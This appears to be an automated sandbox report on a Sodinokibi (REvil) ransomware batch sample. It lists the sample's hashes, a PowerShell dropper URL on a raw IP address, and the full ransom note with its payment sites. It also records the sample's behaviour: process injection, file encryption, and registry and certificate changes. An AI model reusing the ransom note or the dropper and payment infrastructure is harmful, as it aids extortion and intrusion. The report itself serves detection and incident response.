sodinokibi | e4133ab28a0c8965753d56a55beff0bdf47d6bb7d711d708f36f7fe985085a21

General

Target

5356d4234ccf138172e7820bde48cb1d.bat
Size

219B
MD5

7ead0a1f8df272b28f265e05b4f23088
SHA1

07c838862750645da66de62f19d4ac32d852da99
SHA256

e4133ab28a0c8965753d56a55beff0bdf47d6bb7d711d708f36f7fe985085a21
SHA512

b9f721731cfdb058f37dbfc3e42eb519485916eba77b8f1cc3b8f0a1bd7facded50dcf3a2bb6ed87b749f7f01199962061a3005d179184fafdeeef6dfcb3c1b9

Score

10^/10

ransomware sodinokibi persistence

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/5356d4234ccf138172e7820bde48cb1d

Extracted

Path

C:\gst2it-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension gst2it. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A632771ABD9B4A1B 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/A632771ABD9B4A1B Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 9el/1un/v46ZjkxXuR1WLpfEDux62gX2CXSVMnxbiGcCjQmvG/rQChpGDHWl6ghx 1+WB2l8r5uchzIIYWOD/TXTSwytugi+haQ/YdJFUC7pF89S4qZ7LCAMcYFQq9SsF b/wuRx1DiwbdaEM/kfSViD/AzyU+x+AA4/diZytQQizo4toDLAWbtKiIvJ2VY4Nh 2zqbKEIbbX4PCBHOjrvnRcR2/2WvBBOqe0BeZFHvltUGstniE/PyryXOL+P5RZAl Qpc7TobYzTNp+YdRa4Rb7M92XMul9NSvIJqhg8NGKlLrxirY1QZnzpMgp0RTlzS6 IFZyvE5O+Hp5PZzABdrsQWnhaG+SrVo+L+X2XAQnHr9YRTsOUT80ltOV1XJFoHSp QcWE4H7pAzemJKR+1fO8tW2hY96V5Y9n+D0ze91qOucG+DkD5DOhqlpb604CBgM0 VLJqxUdFZvt5yS9nesgYnenCVevtGDdVDXJgzQ2azQ6u8wZV/56jweUXo2ZlAMGw Vr4hSAK0YzAfqRdeSypfJFlHoKGSjfz1Xk5yUUG3KvlSmDr4B51Gkxsa5bwlABP4 irz/YDxRXzHdA8FsFMEBxsrYqWD95ecrG1FVBNb8yqMOm14tIYCia4NkGNn3AKZ/ d05frYz9g3DgHb9zRliFwEZp2+Mn1+7JlwO4MSRaMKQdwt7H+cmjvgz27TA0k8SA mGeHHCeJoApJXE/KX3ZxVxH+DvRHqkgRcrHjK4x6QnZH2bwz8u5TOsJGhG3c1Zjp QlExi6j1egzYwod9pHQgH6p/rdC3h2OcoOhnAXgI5BW3FPOBqrD3USUG9Yz1nGoQ PgBRldp9O9YTA61Z16cZcKIhJqUaDnYL3MNYGkqILqrZaiuzNsbjnFobcAXfRKtM zjUKtst56jxK/DZZhwxZssHSYArQJ8BwmXlkhz6tvcB89gQ+diwxfPuIGVhXdudz 4ZB0wQDqErGT05ukf/TgVFG8r6I8VdkJ9QIvaN8od2nLi+A3VJLsmK4UBt5v4yVM aNyHv++qr1bSbRgcSkomiqRpE2GWTBf5TJdXrDPMgLZSH/gk7Bf1WmZVEdShDF/O YgFZ3IUQU+8XCCnByR7Pol9PeRpGDyRhevazpbHndEGFMofDZ7h53BD3V0yxa5RD ir7JL14BWp9TvUq12BFtgwk00lKRmlW2/2JhEcM0BeKAIOM8RUnWj4n5Jdww4trN +3NO4k06y7eGKnZ8mG9ZBuErSVZH+XfobnTJ93gh+jObUa9Q2cY8W8KaR0Hfx5jD Xce4gNo4qgo+PIYOb9HGObec6tbI+SMHNEfu0Zuq898= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A632771ABD9B4A1B

http://decryptor.cc/A632771ABD9B4A1B

Signatures

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

cmd.exepowershell.exe

description	pid	process	target process
PID 1460 wrote to memory of 1608	1460	cmd.exe	powershell.exe
PID 1460 wrote to memory of 1608	1460	cmd.exe	powershell.exe
PID 1460 wrote to memory of 1608	1460	cmd.exe	powershell.exe
PID 1460 wrote to memory of 1608	1460	cmd.exe	powershell.exe
PID 1608 wrote to memory of 1872	1608	powershell.exe	powershell.exe
PID 1608 wrote to memory of 1872	1608	powershell.exe	powershell.exe
PID 1608 wrote to memory of 1872	1608	powershell.exe	powershell.exe
PID 1608 wrote to memory of 1872	1608	powershell.exe	powershell.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

powershell.exe

pid process

1608 powershell.exe
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi

pid	process
1608	powershell.exe

Modifies service 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exepowershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	1608	powershell.exe
Token: SeDebugPrivilege	1608	powershell.exe
Token: SeDebugPrivilege	1872	powershell.exe
Token: SeBackupPrivilege	1580	vssvc.exe
Token: SeRestorePrivilege	1580	vssvc.exe
Token: SeAuditPrivilege	1580	vssvc.exe
Token: SeTakeOwnershipPrivilege	1608	powershell.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exe

pid process

1608 powershell.exe
1608 powershell.exe
1608 powershell.exe
1872 powershell.exe
1872 powershell.exe

pid	process
1608	powershell.exe
1608	powershell.exe
1608	powershell.exe
1872	powershell.exe
1872	powershell.exe

Blacklisted process makes network request 92 IoCs

Processes:

powershell.exe

flow	pid	process
4	1608	powershell.exe
6	1608	powershell.exe
8	1608	powershell.exe
9	1608	powershell.exe
11	1608	powershell.exe
12	1608	powershell.exe
14	1608	powershell.exe
16	1608	powershell.exe
17	1608	powershell.exe
19	1608	powershell.exe
21	1608	powershell.exe
22	1608	powershell.exe
24	1608	powershell.exe
27	1608	powershell.exe
32	1608	powershell.exe
33	1608	powershell.exe
35	1608	powershell.exe
37	1608	powershell.exe
38	1608	powershell.exe
40	1608	powershell.exe
42	1608	powershell.exe
43	1608	powershell.exe
45	1608	powershell.exe
47	1608	powershell.exe
49	1608	powershell.exe
51	1608	powershell.exe
53	1608	powershell.exe
55	1608	powershell.exe
56	1608	powershell.exe
59	1608	powershell.exe
61	1608	powershell.exe
62	1608	powershell.exe
64	1608	powershell.exe
66	1608	powershell.exe
67	1608	powershell.exe
69	1608	powershell.exe
70	1608	powershell.exe
72	1608	powershell.exe
74	1608	powershell.exe
76	1608	powershell.exe
77	1608	powershell.exe
79	1608	powershell.exe
81	1608	powershell.exe
83	1608	powershell.exe
84	1608	powershell.exe
86	1608	powershell.exe
88	1608	powershell.exe
90	1608	powershell.exe
92	1608	powershell.exe
93	1608	powershell.exe
95	1608	powershell.exe
96	1608	powershell.exe
98	1608	powershell.exe
99	1608	powershell.exe
101	1608	powershell.exe
104	1608	powershell.exe
105	1608	powershell.exe
107	1608	powershell.exe
108	1608	powershell.exe
111	1608	powershell.exe
112	1608	powershell.exe
114	1608	powershell.exe
115	1608	powershell.exe
117	1608	powershell.exe

Enumerates connected drives 3 TTPs

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Drops file in Program Files directory 30 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	\??\c:\program files\CompressCompare.vdw	powershell.exe
File opened for modification	\??\c:\program files\LimitMeasure.xltx	powershell.exe
File opened for modification	\??\c:\program files\ReadConvert.js	powershell.exe
File opened for modification	\??\c:\program files\CompareNew.pcx	powershell.exe
File opened for modification	\??\c:\program files\ReceiveDismount.mpeg	powershell.exe
File opened for modification	\??\c:\program files\RenameConvertTo.kix	powershell.exe
File opened for modification	\??\c:\program files\ConvertFromPing.3gp2	powershell.exe
File opened for modification	\??\c:\program files\WaitResolve.bmp	powershell.exe
File opened for modification	\??\c:\program files\MeasureAdd.jpeg	powershell.exe
File opened for modification	\??\c:\program files\SplitExport.vst	powershell.exe
File opened for modification	\??\c:\program files\DismountClose.wps	powershell.exe
File opened for modification	\??\c:\program files\CompareEnter.wpl	powershell.exe
File opened for modification	\??\c:\program files\CopyClear.rmi	powershell.exe
File opened for modification	\??\c:\program files\SuspendDeny.mpp	powershell.exe
File created	\??\c:\program files\gst2it-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\AssertConfirm.WTV	powershell.exe
File opened for modification	\??\c:\program files\CompareUnblock.xml	powershell.exe
File opened for modification	\??\c:\program files\SendMove.rmi	powershell.exe
File opened for modification	\??\c:\program files\StartUndo.vsdx	powershell.exe
File opened for modification	\??\c:\program files\WriteStart.vsx	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\v3.5\desktop\gst2it-readme.txt	powershell.exe
File created	\??\c:\program files (x86)\gst2it-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\SetResize.snd	powershell.exe
File opened for modification	\??\c:\program files\StartBackup.vst	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\v3.5\gst2it-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\ImportRename.wdp	powershell.exe
File opened for modification	\??\c:\program files\InstallDeny.ram	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\gst2it-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\UninstallDismount.odt	powershell.exe
File opened for modification	\??\c:\program files\FormatBackup.wm	powershell.exe

Modifies extensions of user files 15 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

powershell.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\JoinMove.crw => \??\c:\users\admin\pictures\JoinMove.crw.gst2it	powershell.exe
File renamed	C:\Users\Admin\Pictures\SuspendMerge.crw => \??\c:\users\admin\pictures\SuspendMerge.crw.gst2it	powershell.exe
File renamed	C:\Users\Admin\Pictures\CompareFormat.crw => \??\c:\users\admin\pictures\CompareFormat.crw.gst2it	powershell.exe
File renamed	C:\Users\Admin\Pictures\ConvertFromRemove.crw => \??\c:\users\admin\pictures\ConvertFromRemove.crw.gst2it	powershell.exe
File renamed	C:\Users\Admin\Pictures\FormatResize.crw => \??\c:\users\admin\pictures\FormatResize.crw.gst2it	powershell.exe
File renamed	C:\Users\Admin\Pictures\GrantFormat.tiff => \??\c:\users\admin\pictures\GrantFormat.tiff.gst2it	powershell.exe
File renamed	C:\Users\Admin\Pictures\MeasureRedo.raw => \??\c:\users\admin\pictures\MeasureRedo.raw.gst2it	powershell.exe
File renamed	C:\Users\Admin\Pictures\StepUnregister.tif => \??\c:\users\admin\pictures\StepUnregister.tif.gst2it	powershell.exe
File renamed	C:\Users\Admin\Pictures\AssertExit.crw => \??\c:\users\admin\pictures\AssertExit.crw.gst2it	powershell.exe
File renamed	C:\Users\Admin\Pictures\RepairRemove.raw => \??\c:\users\admin\pictures\RepairRemove.raw.gst2it	powershell.exe
File renamed	C:\Users\Admin\Pictures\SetRestart.png => \??\c:\users\admin\pictures\SetRestart.png.gst2it	powershell.exe
File opened for modification	\??\c:\users\admin\pictures\GrantFormat.tiff	powershell.exe
File renamed	C:\Users\Admin\Pictures\ExpandGroup.png => \??\c:\users\admin\pictures\ExpandGroup.png.gst2it	powershell.exe
File renamed	C:\Users\Admin\Pictures\ExportSplit.png => \??\c:\users\admin\pictures\ExportSplit.png.gst2it	powershell.exe
File renamed	C:\Users\Admin\Pictures\UnblockDisable.tif => \??\c:\users\admin\pictures\UnblockDisable.tif.gst2it	powershell.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\sq7ax9s.bmp"	powershell.exe

Modifies system certificate store 2 TTPs 10 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d578112861900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b06010505070308200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C\Blob = 030000000100000014000000d89e3bd43d5d909b47a18977aa9d5ce36cee184c190000000100000010000000ea6089055218053dd01e37e1d806eedf040000000100000010000000285ec909c4ab0d2d57f5086b225799aa0f000000010000003000000013baa039635f1c5292a8c2f36aae7e1d25c025202e9092f5b0f53f5f752dfa9c71b3d1b8d9a6358fcee6ec75622fabf91400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa22000000001000000850500003082058130820469a00302010202103972443af922b751d7d36c10dd313595300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3139303331323030303030305a170d3238313233313233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c05000382010100188751dc74213d9c8ae027b733d02eccecf0e6cb5e11de226f9b758e9e72fee4d6feaa1f9c962def034a7eaef48d6f723c433bc03febb8df5caaa9c6aef2fcd8eea37b43f686367c14e0cdf4f73ffedeb8b48af09196fefd43647efdccd201a17d7df81919c9422b13bf588bbaa4a266047688914e0c8914cea24dc932b3bae8141abc71f15bf0410b98000a220310e50cb1f9cd923719ed3bf1e43ab6f945132675afbbaaef3f7b773bd2c402913d1900d3175c39db3f7b180d45cd9385962f5ddf59164f3f51bdd545183fed4a8ee80661742316b50d50732744477f105d892a6b853114c4e8a96a4c80bc6a78cfb87f8e7672990c9dfed7910816a1a35f95	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\SystemCertificates\CA\Certificates\E6A3B45B062D509B3382282D196EFE97D5956CCB	powershell.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 040000000100000010000000324a4bbbc863699bbe749ac6dd1d46240f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e650190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000002000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\SystemCertificates\CA\Certificates\E6A3B45B062D509B3382282D196EFE97D5956CCB\Blob = 030000000100000014000000e6a3b45b062d509b3382282d196efe97d5956ccb140000000100000014000000a84a6a63047dddbae6d139b7a64565eff3a8eca1040000000100000010000000b15409274f54ad8f023d3b85a5ecec5d0f00000001000000200000003e1a1a0f6c53f3e97a492d57084b5b9807059ee057ab1505876fd83fda3db8381900000001000000100000007ea7d53d76b46eea695a589c2bdbfdc61800000001000000100000006cf252fec3e8f20996de5d4dd9aef424200000000100000096040000308204923082037aa00302010202100a0141420000015385736a0b85eca708300d06092a864886f70d01010b0500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3136303331373136343034365a170d3231303331373136343034365a304a310b300906035504061302555331163014060355040a130d4c6574277320456e6372797074312330210603550403131a4c6574277320456e637279707420417574686f7269747920583330820122300d06092a864886f70d01010105000382010f003082010a02820101009cd30cf05ae52e47b7725d3783b3686330ead735261925e1bdbe35f170922fb7b84b4105aba99e350858ecb12ac468870ba3e375e4e6f3a76271ba7981601fd7919a9ff3d0786771c8690e9591cffee699e9603c48cc7eca4d7712249d471b5aebb9ec1e37001c9cac7ba705eace4aebbd41e53698b9cbfd6d3c9668df232a42900c867467c87fa59ab8526114133f65e98287cbdbfa0e56f68689f3853f9786afb0dc1aef6b0d95167dc42ba065b299043675806bac4af31b9049782fa2964f2a20252904c674c0d031cd8f31389516baa833b843f1b11fc3307fa27931133d2d36f8e3fcf2336ab93931c5afc48d0d1d641633aafa8429b6d40bc0d87dc3930203010001a382017d3082017930120603551d130101ff040830060101ff020100300e0603551d0f0101ff040403020186307f06082b0601050507010104733071303206082b060105050730018626687474703a2f2f697372672e747275737469642e6f6373702e6964656e74727573742e636f6d303b06082b06010505073002862f687474703a2f2f617070732e6964656e74727573742e636f6d2f726f6f74732f647374726f6f74636178332e703763301f0603551d23041830168014c4a7b1a47b2c71fadbe14b9075ffc4156085891030540603551d20044d304b3008060667810c010201303f060b2b0601040182df130101013030302e06082b060105050702011622687474703a2f2f6370732e726f6f742d78312e6c657473656e63727970742e6f7267303c0603551d1f043530333031a02fa02d862b687474703a2f2f63726c2e6964656e74727573742e636f6d2f445354524f4f544341583343524c2e63726c301d0603551d0e04160414a84a6a63047dddbae6d139b7a64565eff3a8eca1300d06092a864886f70d01010b05000382010100dd33d711f3635838dd1815fb0955be7656b97048a56947277bc2240892f15a1f4a1229372474511c6268b8cd957067e5f7a4bc4e2851cd9be8ae879dead8ba5aa1019adcf0dd6a1d6ad83e57239ea61e04629affd705cab71f3fc00a48bc94b0b66562e0c154e5a32aad20c4e9e6bbdcc8f6b5c332a398cc77a8e67965072bcb28fe3a165281ce520c2e5f83e8d50633fb776cce40ea329e1f925c41c1746c5b5d0a5f33cc4d9fac38f02f7b2c629dd9a3916f251b2f90b119463df67e1ba67a87b9a37a6d18fa25a5918715e0f2162f58b0062f2c6826c64b98cdda9f0cf97f90ed434a12444e6f737a28eaa4aa6e7b4c7d87dde0c90244a787afc3345bb442	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	powershell.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a259074